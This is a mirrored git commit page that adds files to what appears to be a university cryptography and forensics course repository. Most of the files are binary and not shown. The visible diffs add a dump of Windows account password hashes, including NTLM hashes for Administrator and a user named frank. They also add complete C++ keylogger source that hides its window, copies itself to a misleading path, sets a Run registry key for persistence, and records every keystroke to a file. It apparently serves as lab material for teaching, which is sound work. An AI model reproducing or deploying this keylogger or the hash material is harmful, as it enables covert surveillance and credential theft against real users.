mirror of
https://github.com/frankwxu/Ubalt.git
synced 2026-04-10 12:33:42 +00:00
add FSCS728
This commit is contained in:
BIN
FSCS630_Cryptography/labs/00_Number_System/NumberSystems.ppt
Normal file
BIN
FSCS630_Cryptography/labs/00_Number_System/NumberSystems.ppt
Normal file
Binary file not shown.
Binary file not shown.
Binary file not shown.
BIN
FSCS630_Cryptography/labs/05_AES/mix_columns.pdf
Normal file
BIN
FSCS630_Cryptography/labs/05_AES/mix_columns.pdf
Normal file
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,6 @@
|
||||
Administrator:500:NO PASSWORD*********************:FC525C9683E8FE067095BA2DDC971889:::
|
||||
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
|
||||
IEUser:1000:NO PASSWORD*********************:FC525C9683E8FE067095BA2DDC971889:::
|
||||
sshd:1001:NO PASSWORD*********************:NO PASSWORD*********************:::
|
||||
sshd_server:1002:NO PASSWORD*********************:8D0A16CFC061C3359DB455D00EC27035:::
|
||||
frank:1003:NO PASSWORD*********************:36AA83BDCAB3C9FDAF321CA42A31C3FC:::
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,132 @@
|
||||
#define _WIN32_WINNT 0x0500
|
||||
#include <Windows.h>
|
||||
#include <string>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <iostream>
|
||||
#include <fstream>
|
||||
|
||||
#pragma comment(lib, "User32.lib")
|
||||
#pragma comment(lib, "Advapi32.lib")
|
||||
|
||||
/* Based on https://github.com/EgeBalci/Keylogger */
|
||||
|
||||
using namespace std;
|
||||
|
||||
char logfile[] = "log.txt";
|
||||
|
||||
char oldfile[] = "keylogger_sam.exe";
|
||||
char newfile[] = "C:\\Logs\\vmx32to64.exe";
|
||||
|
||||
void LOG(string input) {
|
||||
fstream LogFile;
|
||||
LogFile.open(logfile, fstream::app);
|
||||
if (LogFile.is_open()) {
|
||||
LogFile << input;
|
||||
LogFile.close();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
bool SpecialKeys(int S_Key) {
|
||||
switch (S_Key) {
|
||||
case VK_SPACE:
|
||||
cout << " ";
|
||||
LOG(" ");
|
||||
return true;
|
||||
case VK_RETURN:
|
||||
cout << "\n";
|
||||
LOG("\n");
|
||||
return true;
|
||||
case VK_OEM_PERIOD:
|
||||
cout << ".";
|
||||
LOG(".");
|
||||
return true;
|
||||
case VK_SHIFT:
|
||||
cout << "#SHIFT#";
|
||||
LOG("#SHIFT#");
|
||||
return true;
|
||||
case VK_BACK:
|
||||
cout << "\b";
|
||||
LOG("\b");
|
||||
return true;
|
||||
case VK_RBUTTON:
|
||||
cout << "#R_CLICK#";
|
||||
LOG("#R_CLICK#");
|
||||
return true;
|
||||
case VK_CAPITAL:
|
||||
cout << "#CAPS_LOCK#";
|
||||
LOG("#CAPS_LOCK");
|
||||
return true;
|
||||
case VK_TAB:
|
||||
cout << "#TAB";
|
||||
LOG("#TAB");
|
||||
return true;
|
||||
case VK_UP:
|
||||
cout << "#UP";
|
||||
LOG("#UP_ARROW_KEY");
|
||||
return true;
|
||||
case VK_DOWN:
|
||||
cout << "#DOWN";
|
||||
LOG("#DOWN_ARROW_KEY");
|
||||
return true;
|
||||
case VK_LEFT:
|
||||
cout << "#LEFT";
|
||||
LOG("#LEFT_ARROW_KEY");
|
||||
return true;
|
||||
case VK_RIGHT:
|
||||
cout << "#RIGHT";
|
||||
LOG("#RIGHT_ARROW_KEY");
|
||||
return true;
|
||||
case VK_CONTROL:
|
||||
cout << "#CONTROL";
|
||||
LOG("#CONTROL");
|
||||
return true;
|
||||
case VK_MENU:
|
||||
cout << "#ALT";
|
||||
LOG("#ALT");
|
||||
return true;
|
||||
default:
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
int main()
|
||||
{
|
||||
ShowWindow(GetConsoleWindow(), SW_HIDE);
|
||||
char KEY = 'x';
|
||||
|
||||
/* COPY PROGRAM TO MISLEADING LOCATION */
|
||||
CopyFile(oldfile, newfile, FALSE);
|
||||
|
||||
/* CREATE RUN KEY IN REGISTRY */
|
||||
|
||||
TCHAR runPath[35] = TEXT("C:\\Logs\\vmx32to64.exe");
|
||||
HKEY newValue;
|
||||
RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&newValue);
|
||||
RegSetValueEx(newValue,"vmx32to64",0,REG_SZ,(LPBYTE)runPath,sizeof(runPath));
|
||||
RegCloseKey(newValue);
|
||||
|
||||
while (true) {
|
||||
Sleep(10);
|
||||
for (int KEY = 8; KEY <= 190; KEY++)
|
||||
{
|
||||
if (GetAsyncKeyState(KEY) == -32767) {
|
||||
if (SpecialKeys(KEY) == false) {
|
||||
|
||||
fstream LogFile;
|
||||
LogFile.open(logfile, fstream::app);
|
||||
if (LogFile.is_open()) {
|
||||
LogFile << char(KEY);
|
||||
LogFile.close();
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Reference in New Issue
Block a user